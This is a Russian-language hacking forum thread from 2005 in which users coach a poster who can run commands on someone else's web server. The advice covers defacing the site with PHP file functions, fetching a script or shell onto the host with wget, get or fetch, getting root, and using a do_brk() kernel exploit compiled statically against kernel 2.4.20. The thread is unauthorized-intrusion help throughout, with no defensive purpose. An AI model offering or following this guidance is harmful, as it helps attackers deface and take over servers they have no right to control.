Что делать?
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Что делать? - 2005-05-27 03:20:44
|
|
|
Zaris
Сообщений: 13
Оценки: 0
Присоединился: 2005-01-02 07:27:39
|
Я могу выполнять произвольные команды с правами вебсервера. Как мне задефейсить этот сайт? Подскажите команду которая создает и записывает в файл строки.
|
|
|
Что делать? - 2005-05-27 10:01:49
|
|
|
jEnizix
Сообщений: 1797
Оценки: 0
Присоединился: 2004-12-30 11:03:50
|
Ну а ПХП там есть? почитай по ф-иям ПХП : fopen() fputs() fclose()
|
|
|
Что делать? - 2005-05-27 11:02:44
|
|
|
deZZineSS
Сообщений: 73
Оценки: 0
Присоединился: 2004-08-24 21:32:20
|
[p]quote:
—————-<BR>Цитата: Дата:27.05.2005 3:20:44, Автор: Zaris :: Я могу выполнять произвольные команды с правами вебсервера. Как мне задефейсить этот сайт? Подскажите команду которая создает и записывает в файл строки. —————-
ИМХО, лучше получить там рут-шелл. Так же можно повесить баунсер или еще чего. Нах тебе дефейс этот сдался? [sm=sm128.gif]
|
|
|
Что делать? - 2005-05-27 17:05:25
|
|
|
Zaris
Сообщений: 13
Оценки: 0
Присоединился: 2005-01-02 07:27:39
|
Да там и пхп стоит. Только чтобы пользоватся этими ф-ми нужно сначало туды скрипт залить. Как wget'oм закачать файл с адресса www.site.com/1.php в директорию /home/bug_www.
|
|
|
Что делать? - 2005-05-27 17:52:01
|
|
|
DenJer
Сообщений: 15
Оценки: 0
Присоединился: 2004-09-28 17:15:39
|
У тебя походу прав на запись в эту папку нет. Ты так ни скрипт не зальешь, ни сатраницу не задефейсишь.
|
|
|
Что делать? - 2005-05-27 17:57:34
|
|
|
A66at
Сообщений: 94
Оценки: 0
Присоединился: 2005-03-31 22:55:43
|
wget http://server/file.php. Сохранит в текущей дире с именем file.php. Но там может и не стоять wget. Проверь: which wget. Альтернативные качалки - get и fetch. Синтаксис точно такой же… Просто я не помню - в некоторых командах сначала идет имя файла, под которым сохраняется инет-ресурс, а потом имя ресурса. проще потом переименовать - mv old.name new.name. Но имхо лучше все-таки залить shell. У меня сейчас такая же проблема - стоит сервер, там у меня шелл есть, но вот дефейс мне нах не нужен, надо рута получить там… Но никто пока никаких советов не накинул. Удачи.
|
|
|
Что делать? - 2005-05-29 00:34:13
|
|
|
Zaris
Сообщений: 13
Оценки: 0
Присоединился: 2005-01-02 07:27:39
|
Короче выяснил что там ядрышко - 2.4.20-4. Подскажите как эксплоит найти для него. В принципе там есть ещё и Apache - 1.3.27 может для него тоже что нить есть? Мне бы желательно проверенное.
|
|
|
Что делать? - 2005-05-29 10:42:54
|
|
|
DenJer
Сообщений: 15
Оценки: 0
Присоединился: 2004-09-28 17:15:39
|
Попробуй этот сплоит, для уязвимости в do_brk(). Компиль его с флагом -static.
|
|
|
|
|